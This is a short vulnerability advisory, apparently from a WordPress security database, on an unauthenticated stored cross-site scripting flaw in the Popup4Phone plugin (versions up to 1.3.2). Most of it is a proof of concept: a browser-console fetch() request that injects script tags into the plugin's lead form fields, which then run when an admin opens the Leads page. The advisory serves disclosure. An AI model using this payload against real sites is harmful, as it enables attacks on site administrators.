Popup4Phone <= 1.3.2 - Unauthenticated Stored XSS

Description The plugin does not sanitise and escape some parameters, which could allow unauthenticated users to perform Cross-Site Scripting attacks against admins.

PoC

Run the following JavaScript in the browser console: fetch("/", { "headers": { "content-type": "application/x-www-form-urlencoded", }, "method": "POST", "body": "popup4phone%5Bws_pages_submit_url%5D=&popup4phone;%5Bws_pages_submit_title%5D=Popup4Phone+%E2%80%93+WPScan+Vulnerability+Testbench&popup4phone;%5Bname%5D=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&popup4phone;%5Bphone%5D=%22%3E%3Cscript%3Ealert(2)%3C%2Fscript%3E&popup4phone;%5Bemail%5D=test%40example.com&popup4phone;%5Bmessage%5D=test&ajax;=1", "credentials": "include" }).then(response => response.text()) .then(data => console.log(data)); After running the JavaScript, log in as an admin and browse to “Popup4Phone > Leads” and see the XSS